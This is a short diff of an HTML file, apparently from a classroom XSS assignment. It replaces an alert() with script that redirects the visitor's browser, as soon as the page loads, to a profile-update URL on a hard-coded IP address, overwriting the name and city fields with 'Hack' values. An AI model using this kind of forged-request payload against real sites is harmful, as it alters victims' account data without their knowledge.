--- a/xss.html
+++ b/xss.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
 <script>
-    alert("HEY HEY HEY");
+    window.location.href="http://67.208.233.162/XSSAssignment/Profile.php?fnameBox=HackFirstName&lnameBox=HackLdsdsdsdastName&cityBox=HackVille&submit=Update"
 </script>
 <body>
 
